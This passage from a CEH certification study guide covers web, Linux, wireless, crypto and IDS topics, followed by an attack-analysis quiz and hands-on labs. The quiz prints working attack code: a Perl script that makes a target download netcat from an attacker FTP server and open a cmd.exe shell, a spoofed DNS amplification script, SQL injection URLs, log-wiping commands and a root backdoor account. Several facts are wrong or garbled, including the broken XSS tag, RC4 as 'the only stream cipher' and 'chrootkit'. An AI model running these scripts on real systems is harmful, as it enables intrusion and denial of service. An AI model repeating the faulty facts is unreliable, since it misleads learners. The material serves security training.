executed on your local machine under your privileges without your knowing.
Cross-site scripting attacks often try to grab a person’s cookie. To view your cookie
via Javascript for a particular site, the code would be
<script>alert(document.cookie)</cookie>.
The best way to protect against XSS attacks is to disable Javascript in IE and Firefox
browsers.
236. Lynx is a scaled down, text-based, basic web browser that you can use when testing sites which you suspect may have malicious code on it.
237. Use HTTP SSLv3 to send data instead of plain HTTPS.
C|EH Study Guide
Hacker University Page 22
238. Java uses a sandbox to isolate code and is therefore not vulnerable to buffer
overflow attacks.
239. The GET method should never be used when sensitive data such as credit card
information is being sent to a CGI program. This is because any GET command will
appear in the URL. Replace the GET method with the POST method when sending data.
240. Session management web application testing is focused on checking the time
validity of session tokens, length of tokens, and expiration of session tokens.
241. Website cloaking is a technique to perform a reverse IP address lookup to get
the domain name of a person browsing your site. Once this is determined, you can
direct them to a specific version of a page for particular domains.
242. To protect against that run on top of SSL, install a proxy server and terminate SSL
at the proxy or install a hardware SSL “accelerator” and terminate SSL at this layer.
243. An example of a Web Bug is a small .jpg file that is one pixel in height and in
width that can cause unwanted behavior when users browse a site.
244. SSL operates at the transport layer and S-HTTP operates at the application layer.
Web Based Password Cracking
245. Passwords can be basic, digest, or integrated. Basic sends the password in clear text so it is easily sniffed. Digest is more secure than basic because passwords are hashed.
246. Single sign-on is when users only have to remember one username and password to be authenticated to multiple services.
247. The Remote Password Assassin (RPA) is a password cracking tool that can run dictionary attacks against FTP and Web servers. To defend against these types of attacks you should:
Never use a password related to a hostname, domain name, or anything else that can be found with whois
Never use a password related to your hobbies, pets, relatives, or date of birth
Never leave a default password
Never use a password that can be found in a dictionary
Linux Hacking
248. ps is the command to list processes running on a system. 249. Rootkits can be used to hide processes, files, or registry entries.
250. The three most common commands that hackers attempt to Trojan on a Linux
box are netstat, ps, and top.
251. Loadable Kernel Modules (LKM) are compiled on the fly; they do not require you to recompile the kernel).
252. Cygwin is a free UNIX subsystem that runs on top of Windows.
C|EH Study Guide
Hacker University Page 23
253. Rootkits are often used to replace legitimate programs. For example, you could use it to replace IFCONFIG in Linux to prevent others from seeing that your network card is operating in promiscuous mode.
254. Hackers will often try to cover their tracks. On Linux machines, a hacker can
remove rootkits that they installed with the ‘rm’ command.
255. The execve() system call is used with setuid to escalate privileges. The best way
to protect against execve() vulnerabilities is to disable the execve() system call.
256. IP Tables, available in Linux kernel 2.4 and up and provides for stateful packet
inspection (SPI). The following is an example of an IP Tables rule that allows TCP
packets coming in on interface eth1 from any IP address destined for 172.16.1.1:
Iptables -A INPUT -s 0/0 -I eth1 -d 172.16.1.1 -p TCP -j ACCEPT
257. Filesnarf copies files transferred via NFS over a network.
258. You can check for the presence of rootkits in Linux by typing sudo
chrootkit.
259. You can wipe a Linux hard drive with the following command:
For (( i = 0; i<11; i++ )); do
Dd if=/dev/random of=/dev/had && dd if=/dev/zero
of=/dev/had
Done
260. Linux password hashes are stored in the /etc/shadow file.
261. You can run the wipe –fik /dev/hda1 command in Knoppix to
permanently erase data on a hard drive.
Cryptography
262. Hashing algorithms are used to guarantee the integrity of messages. SHA-1 creates a 160-bit hash; MD5 creates a 128 bit hash. Note: on the exam you may see this referred to as the “number of bits of encryption” and not the word hash.
263. Integrity can be defined as sound, unimpaired or perfect condition. 264. RC4 is the only stream cipher. Stream ciphers are a type of symmetric key
encryption algorithm that transforms a stream of plaintext characters into a stream of ciphertext characters of the same length.
265. The tradeoff of encryption is speed. IPSEC VPNs can slow down your network. 266. Cryptography attacks include chosen-ciphertext, known ciphertext, and replay
attacks 267. PKI is a way to distribute symmetric keys, usually by using asymmetric
encryption techniques. 268. With XOR operations, if both values are the same, the result is zero. If the values
are different, then the result is one.
Value1 Value2 Result
0 0 0
C|EH Study Guide
Hacker University Page 24
1 0 1
0 1 1
1 1 0
269. A digital signature is the hash of a message that is encrypted with a private key.
270. Microsoft Authenticode technology is used to digitally sign ActiveX controls.
271. DES, AES, and Blowfish are all examples of block ciphers. RC4 is a stream cipher.
272. The most common way of cracking RSA encryption is to discover the two prime
numbers used in the RSA PKI mathematical process through factorization.
273. PGP is a good solution when you need a low cost solution to encrypt e-mail.
Government Access to Keys (GAK) allows a government investigator to ask for your
encryption keys and algorithms.
274. Message repudiation means a sender can claim they did not actually send a
particular message.
275. SSH is a common tunneling tool. SSH uses port 22 and must be allowed through
your firewall in order for you to establish a SSH session.
SSH can be used to tunnel plain text traffic such as POP3. It is a good alternative
when you do not have VPN capabilities.
If port 22 is not open on your firewall, PuTTY (a common SSH client) will report
Network error: Connection reset by peer.
SQL Injection
276. You can test SQL injection by entering a single quote or by typing “anything’ or
1=1—“ in a username field on a web site.
277. The next step after determining that a web site is vulnerable is to identify the
database and table name by running:
http://www.mysite.com/test/include.asp?numberID=4 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects
WHERE xtype=‟U‟),1))) > 109
278. An example of SQL injection is
http://www.testsite.com/data.asp?name=me%27%3bupdate%20user
table%20set%20pass%3d%27letmein%27%3b--%00
279. SQL injection can be used where there are poorly designed input validation
routines.
280. The following is an example of code that is susceptible to a SQL injection attack
because it provides no input validation:
sSQL=”SELECT * FROM Users where Username=‟” &
Request(“user”) & “‟and Password=‟” & Request(“pwd”) &
“`”
C|EH Study Guide
Hacker University Page 25
Hacking Wireless Networks
281. Air Snort implements the Fluhrer-Mantin-Shamir (FMS) attack. Only encrypted
packets are counted. You need to capture around five to ten million packets in order to
crack WEP with AirSnort.
282. Wireless access points act like hubs on a network. Therefore, you will be able
to capture more traffic in a shorter amount of time on a wireless network than on a
wired network.
283. Aircrack uses KoreK’s implementation for wireless hacking. AirSnort uses the
FMS attack.
284. A wireless injection attack is when you re-inject ARP requests hundreds of times
per second on a wireless network.
285. SSIDs are not considered a good security mechanism to protect against a
wireless network because the SSID is transmitted in clear text.
286. In warchalking, a )( symbol represents an open access point
(unfiltered/unencrypted).
287. Wardriving is when a hacker drives around in a car looking for wireless networks.
288. If a wireless access point is using MAC filtering, sniff traffic on the WLAN and
spoof your MAC address to one you have captured.
289. Even if a network disables SSID broadcast, you can still get the SSID by sniffing
the wireless network. The SSID is still sent inside both client and AP packets.
290. Directional antennas are not enough to secure your network because wireless signals can still be detected from miles away.
291. If you are not capturing enough traffic to crack a WEP key, use a sniffer like
Ettercap to discover the gateway then send an ICMP ping flood to generate traffic.
292. A rogue access point is an unauthorized access point that overrides the signal of an authorized access point.
293. 802.11a operates in the 5.15 – 5.825 GHz frequency.
294. VPNs are often used in wireless networks but they will double the overhead on
an access point.
295. WEP encryption is vulnerable because there is no mutual authentication
between wireless clients and access points, automated tools can discover WEP keys, and
the 24 bit IV field is too small.
296. The SSID identifies your wireless network and acts as a password for network
access.
297. GPSDrive can be used to map wireless access points.
Viruses
298. Messenger spam is when you receive a pop up on your screen with SPAM. It
usually uses ports 1026 to 1029.
C|EH Study Guide
Hacker University Page 26
299. The following are common file attachments that are used by viruses and
malware:
.scr
.vbs
.com
.exe
.pif
.htm
300. MS Blaster exploits port 135 and 445. A Snort rule to detect MS Blaster will
reference these ports:
Alert TCP $EXTERNAL_NETWORK any $INTERNAL_NETWORK 135
Alert tcp $EXTERNAL_NETWORK any $INTERNAL_NETWORK 445
301. The European Institute for Computer Antivirus Research has created the
following string that can be used as a harmless test virus to test your antivirus software:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-
FILE!$H+H*
302. Signature based virus scanners are only as good as their signature database. If there is no signature, then a virus will not be detected.
303. To check for unauthorized changes to files, use file integrity verification tools.
Tripwire is a popular file integrity verifier. 304. Antivirus programs compare the signature of executable files to a database of
known viral signatures. Polymorphic viruses cannot be detected by a signature-based
anti-virus program.
305. Melissa is a macro virus. 306. The Slammer worm exploits a buffer overflow in the MS-SQL resolution service. 307. The best protection against viruses is prevention, not detection. That is, you
should stop viruses from getting onto the system in the first place, not just scan for viruses. One way to stop viruses from getting onto your system is to disable the use of external media such as USB thumb drives and floppy disks.
308. A worm is self-replicating while a virus attaches itself to another host. 309. Nimda exploits the directory traversal Unicode exploit in IIS. (E.g., GET
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.e
xe?/c+dir) 310. The OSX/Leap-A virus is a MAC OS X virus that spreads via iChat.
Evading IDS, Firewalls, and Honeypots
311. To operate Snort in packet logger mode, type ./snort –dev –l ./log
C|EH Study Guide
Hacker University Page 27
312. Session splicing is when an attacker attempts to deliver the payload over a
continuous stream of multiple small packets over long periods of time with the purpose
of defeating simple pattern matching in IDS systems without session reconstruction.
313. Snort can operate as an IDS, packet logger, or sniffer.
314. The Send-Safe proxy server can be used to help evade honeypots.
315. Snort has great flexibility in creating rules. For example, the following rule will
alert you whenever a TCP packet originating from any IP address and destined for any IP
address on the 10.0.0.0 subnet on port 2222: alert tcp any any
10.0.0.0/8 2222. As another example, here is the rule to capture FTP root login
attempts: alert tcp any any any any 21 (content: “user
root”;).
316. A SOCKS proxy can be used to transparently connect through a firewall. SOCKS
uses port 1080.
317. Obfuscation techniques include using non-standard ports or redirecting attempts
to standard ports to a secure area that is logged.
318. Encrypting communication between an agent and a monitor in an IDS is useful
because the monitor will know if counterfeit messages are being generated (they will
not be encrypted).
319. Firewalls cannot inspect encrypted traffic such as that used with SSL on port 443.
SSL can be used to mask the contents of a packet and bypass the intruder detection
systems.
320. A hacker can use Tor for anonymity on the Internet by going through multiple
proxy servers on the Internet.
321. Snort is a freeware, open source program that can be used to detect attacks such
as port scans.
322. Fragroute is a tool that will craft packets to confuse pattern matching IDS's. 323. A honeytoken is a fake document that is set up to see if employees are accessing
unauthorized documents. 324. A covert channel is making use of a protocol in a way it was not intended to be
used. It is a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS’s on a network. This is sometimes called a network tunnel.
325. A host can continue to receive data as long as the SYN sequence numbers of transmitted packets from another host are lower than the packet segment containing a set FIN flag.
326. A clue that your packets might be going through a stateful inspection firewall is that a traceroute shows the same IP address twice.
327. If web servers in a DMZ are responding to ACK packets on port 80, then chances are there is no stateful inspection firewall in use.
C|EH Study Guide
Hacker University Page 28
328. A false positive occurs when the IDS/IPS system classifies an action as anomalous when it is legitimate action. A false negative occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior.
Social Engineering
329. You will need to enforce the corporate network security policy to resolve issues
with employees bypassing the firewall by attaching a modem to their telephone line and
workstations.
330. Social engineering can help you bypass a firewall. For example, you can create a
web page that users can click on and, upon clicking, a keylogger can be embedded on
their system.
331. Social engineering is the act of getting needed information from a person rather
than breaking into a system.
332. An example of a phishing attack is when you receive an e-mail asking you to click
on a link that takes you to a different site than what is mentioned in the e-mail.
333. The current most common vehicle for social engineering attacks is e-mail.
334. Social engineering is easy and extremely effective method to gain information.
335. The best way to break into a highly secure system that is virtually impenetrable
is to use social engineering tactics like bribing employees with money to provide you
with sensitive information.
336. The weakest links in the security chain are untrained staff or ignorant computer
users who inadvertently become the weakest link in your security chain.
337. To determine the first octet of a DWORD encoded URL, divide the number by 16,777,216.
338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222.
339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.
Physical Security
340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access into a building.
341. RFID tags are often used to manage inventory but they could leak out sensitive information so they should be disabled when the tags are no longer needed. Use RFID kill switches in RFID chips to disable RFID tags when they are no longer needed
C|EH Study Guide
Hacker University Page 29
Attack Analysis
Attack #1 #rm rootkit.c
#ps –aux { grep inetd ; ps –aux|grep portmap ; rm /sbin/portmap ; rm
/tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf
/root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps
–aux | grep portmap ; rm /sbin/port359 ? 00:00:00 inetd
#ps –aux | grep portmap
#ps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/portmap ; rm
/tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf
/root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps
–aux | grep portmap ; rm /sbin/port359 00:00:00 inetd
What is the attacker trying to do?
A. Cover his/her tracks
B. Port scan
C. Escalate privileges
D. Man-in-the-middle attack
Attack #2 GET
/msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\HTTP/1.1..Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/msword, application/vnd.ms-
powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows
95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie:
ASPSESSIONIDGQQQQQZU=KNOHEMW
C|EH Study Guide
Hacker University Page 30
What type of attack is being performed?
A. SQL injection
B. Firewalking
C. Directory Traversal
D. Cross-site scripting
Attack #3 A screen pops up on your screen with the following message:
Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM
STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
Windows has found Critical Errors.
To fix the errors please do the following:
1. Download Registry Repair from http://www.repairreg.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION
What could cause this message?
A. Windows messenger SPAM
B. MyDoom virus
C. Beast Trojan
D. Denial of Service attack
C|EH Study Guide
Hacker University Page 31
Attack #4 You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO
packets have ICMP ID: 39612 and Seq:57072. 13 of the ICMP_ECHO packets have ICMP ID:0 and Seq:0.
What does this mean?
A. Attacker is using NAT.
B. Attacker modified TCP/IP stack on the attacking system.
C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.
D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
Attack #5 Log entry:
1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP
TTL:63 TOS:0x10 ID:11842 DF
What service is being exploited?
A. SMTP
B. FTP
C. WWW
D. SQL
Attack #6
Mkdir –p /etc/X11/appInk/Internet/.etc
Mkdir –p /etc/X11/appInk/Internet/.etcpasswd
Touch –acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd
Passwd nobody –d
/usr/sbin/adduser dns –d/bin –u 0 –g 0 –s/bin/bash
C|EH Study Guide
Hacker University Page 32
Passwd dns –d
Touch –acmr /etc/X11/appInk/Internet/.etcpasswd /etc/passwd
Touch –acmr /etc/X11/appInk/Internet/.etc /etc
Is the attacker trying to change the password of an account?
How many accounts are being manipulated?
Attack #7 12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS ……………….
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
C|EH Study Guide
Hacker University Page 33
<OUTPUT OMITTED>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL: 63 TOS: 0x10 ID: 48231 DF
*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr
65 63 74 2E 0D 0A etc…
Was the attacker successful?
Attack #8 ############################################
$port = 53; # Spawn cmd.exe on port X
$your = “192.168.1.1”; # Your FTP server
$user = “Anonymous”; #login as
$pass = „[email protected]‟; #password
############################################
$host = $ARGV[0];
print “Starting…\n”;
print “Server will download the file nc.exe from $your FTP server.\n”;
system(“perl msadc.pl –h $host –C \”echo open $your >sasfile\””);
system(“perl msadc.pl –h $host –C \”echo $user>>sasfile\””);
system(“perl msadc.pl –h $host –C \”echo $pass>>sasfile\””);
system(“perl msadc.pl –h $host –C \”echo bin>>sasfile\””);
system(“perl msadc.pl –h $host –C \”echo get nc.exe>>sasfile\””);
system(“perl msadc.pl –h $host –C \”echo get hacked.html>>sasfile\””);
C|EH Study Guide
Hacker University Page 34
system(“perl msadc.pl –h $host –C \”echo quit>>sasfile\””);
print “Server is downloading…\n”;
system(“perl msadc.pl –h $host –C \”ftp \-s\:sasfile\””);
print “Press ENTER when download is finished .. (That‟s why it‟s good
to have your own ftp server)\n”;
$o=<STDIN>; print “Opening…\n”;
system(“perl msadc.pl –h $host –C \”nc –l –p $port –e cmd.exe\””);
print “Done.\n”;
#system(“telnet $host $port”); exit(0);
What does this code do?
A. Creates a share called sasfile
B. Creates a backdoor account
C. Opens a telnet listener that requires no username or password
D. Creates a FTP server
Attack #9 use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,”ns.list”);
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
C|EH Study Guide
Hacker University Page 35
if ($ARGV[0] eq „‟) {
print “Usage: ./hackme.pl <target IP> <loop
count>\n”;
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet(“google.com”, “ANY”);
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip=> { saddr => $source, daddr => $list[$i],
frag_off=>0,tos=0,id=>1565, udp => {source => 53, dest => 53,
data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attack is this?
A. DNS lookup attacks
B. DNS reflection and amplification attack
C. FTP DOS
D. FTP backdoor
C|EH Study Guide
Hacker University Page 36
Attack #10 C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt
Volume in drive C has no label.
Volume Serial Number is 3105-51BF
Directory of C:\
3/14/04 04:12a 0 AUTOEXEC.BAT
3/14/04 8:01a 322 boot.ini
3/14/05 12:44p <DIR> WINNT
3/14/05 12:10p <DIR> TEMP
1,221,095,103 bytes free
C:\>type file.txt
C:\>copy file.txt c:\inetpub\wwwroot
C:\>GET file.txt HTTP/1.1
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 15:44:12 GMT
ETag: “9814ed8abc83103:8ff”
Content-Length: 5131
What is the hacker trying to steal?
A. file.txt
B. index.html
c. sam.txt
d. cmd.exe
C|EH Study Guide
Hacker University Page 37
Attack #11 Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from
194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 ->
172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 ->
172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:
194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from
24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 ->
172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 ->
172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 ->
172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard:
198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 ->
172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 ->
172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for
user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user
simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 ->
172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23
-> 213.28.22.189:4558
What type of attack is this?
A. Unsuccessful port scan
B. The hacker has a backdoor into the compromised system
C. A DNS poisoning attack
D. An unsuccessful WEP attack
C|EH Study Guide
Hacker University Page 38
Attack #12 Below is the e-mail header of a spoofed header found on the Internet. What is the IP address of the
true source?
Return-Path: <[email protected]>
Received: from smtp.com (fw.emumail.com [215.52.220.122].
by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id
h78NIn404807
for <[email protected]>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network.; 8 Aug 2003
23:25:25 -0000
Received: from ([19.25.19.10].
by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123.
by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <[email protected]>
To: "mikeg" <[email protected]>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal.
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Attack #13
The following code is vulnerable to what type of attack? <%
Set objConn = CreateObject("ADODB.Connection")
objConn.OpenApplication("WebUsersConnection")
sSQL="SELECT * FROM Users where Username=? & Request("user") & _
"?and Password=? & Request("pwd") & "?
Set RS = objConn.Execute(sSQL)
If RS.EOF then
Response.Redirect("login.asp?msg=Invalid Login")
Else
Session.Authorized = True
Set RS = nothing
Set objConn = nothing Response.Redirect("mainpage.asp")
End If
%>
C|EH Study Guide
Hacker University Page 39
Attack #14
Below is a partial hexdump of a packet. What version of Microsoft IIS is this web server?
000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 [email protected]......
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep-
070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra
Attack #15
Below is a sample output of a web log. What type of attack is being performed her? Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
C|EH Study Guide
Hacker University Page 40
Labs Introduction
A Certified Ethical Hacker must possess expert-level skills to successfully attack and defend
systems. There is often more than one way to exploit a system, so creativity and ‘out-of-the-
box’ thinking are encouraged. These labs are designed not to teach you a specific tool for an
exploit, but to give you an opportunity to test out your knowledge and skills that you are
acquiring in a lab environment.
Exam Relevance
None of these labs are required for you to master in order to pass the C|EH exam.
Software Used in Labs
EC-Council does their best to update the content in their included CDs. In some cases, the tools
mentioned in these labs may not be included in the CDs or may be outdated, so if you can’t find
the tool on your computers, you may want to download the software off of the Internet. Your
instructor can help you find the software.
Footprinting
Footprint the http://www.certifiedhacker.com web site.
Suggested tools:
www.dnsstuff.com
Sam Spade
Smart Whois
www.archive.org
www.kloth.net
IP2Country
NewTracePro
Visual Route
www.centralops.net
Which ISP Owns IP
WhereIsIP
What does it mean to footprint a web site?
C|EH Study Guide
Hacker University Page 41
What is the contact information for this web site?
Where is the web site located?
What is the IP address of this web site?
When was the web site first put up?
How is Footprinting a web site helpful to an ethical or malicious hacker?
Scanning 1) Nmap.
Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other
hosts in the classroom. Watch for RSTs, SYN/Acks, etc. coming from the host you are scanning.
2) Hping
Read through the Hping2 man page (available online or in Linux)
Perform a port scan on a computer in the classroom
Experiment with different options in Hping2 to try different types of scans
Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site.
Do you prefer Hping3 or Hping2? Why?
C|EH Study Guide
Hacker University Page 42
How could a malicious or ethical hacker use Hping2 or Hping3?
Enumeration Ask another student or your instructor to set up additional accounts and some shares on their
computer.
Enumerate the computer.
What is the SID of the Administrator account?
What users exist on the computer?
What is the password of the Administrator? (Hint: NAT or Venom can help you with this)
How do you test for NULL sessions?
How do NULL sessions help you with hacking?
How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security
policies).
System Hacking Password Cracking
Create three additional users on your computer. Assign one user a short dictionary password of less
than eight characters. Give a blank password to another. Assign a difficult password to the third.
C|EH Study Guide
Hacker University Page 43
Get the hash of the Administrator account.
Suggested tools:
L0phtcrack
Pwdump3v2
Ntinfoscan
What is the password to the Administrator account?
When was the Administrator account last changed?
Are you able to get the passwords of the other accounts?
Steganography
Hide the message “you’ve been hacked” on your computer.
Suggested tools:
NTFS Alternate Data Streams
Snow
NT Rootkit
Blindside
Trojans and Backdoors Launching A Trojan
Take control of another computer using a Trojan or Backdoor. Note: we haven’t covered the different
ways of getting a Trojan on another computer yet, so for this lab you may want to work with another
student to launch the Trojan on another computer.
Suggested tools:
NetBus
SubSeven
BackOrifice2000
C|EH Study Guide
Hacker University Page 44
Donald Dick
Beast
Use Netcat to gain shell access to your victim host.
What is the Netcat syntax on the victim host?
Read the Netcat man page. What other things can you do with Netcat?
Can you think of any ways you might get the Trojan on the victim host?
Detecting Trojan Activity
Detect the ports and processes running on your computer. Suggested tools:
Fport
TCP View
What’s on my computer?
Hacker Eliminator
Process Viewer
Windows task manager
Netstat Did you find any Trojans running on your computer? If so, what ports are they listening on? Trojan Wrappers Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).
Sniffers
1) Sniff web traffic on the network. Suggested tools:
Ettercap (Linux)
Windump/tcpdump
C|EH Study Guide
Hacker University Page 45
Wireshark/Ethereal 2) MSN chat Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each other’s conversation? Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM. Can you see each other’s conversation? 3) E-mail Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages? 4) ARP poisoning / MAC flooding Test out ARP poisoning and/or MAC flooding to capture all traffic. Suggested tools:
Ettercap (Linux)
Macof (Linux)
Cain & Abel Can you see traffic from other hosts?
Denial Of Service
As a class, agree on a denial of service tool and launch it against a single computer in the classroom. Suggested tools:
DDOSPing
Blast20
Nemesy13
Datapool If possible, launch multiple processes of these tools. On the victim host, launch task manager and/or performance monitor to see if you are making an impact.
C|EH Study Guide
Hacker University Page 46
Session Hijacking The following is from http://www.csn.ul.ie/~syfer/tutorials/sessionhijacking.htm. It requires the use of
a hub in the classroom. Depending on your location, you may or may not have a hub.
Session Hijacking
Session hijacking. What a powerful name. For me personally, the name conjures up mental pictures of
airplanes with masked gunmen and bomb-laden buses. In actuality, session hijacking is far less physically
dangerous but way more financially rewarding.
In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to
the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched
networks) is a great way to collect passwords.
Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that
crosses the network. This is where session hijacking can become your friend (or your worst enemy
depending on which side of the infosec coin you're on.) In this article I will detail Netflood's test results
and the techniques we used to hijack active sessions.
Abstract:
In order to session hijack traffic, multiple attacks or techniques may have to take place. For example,
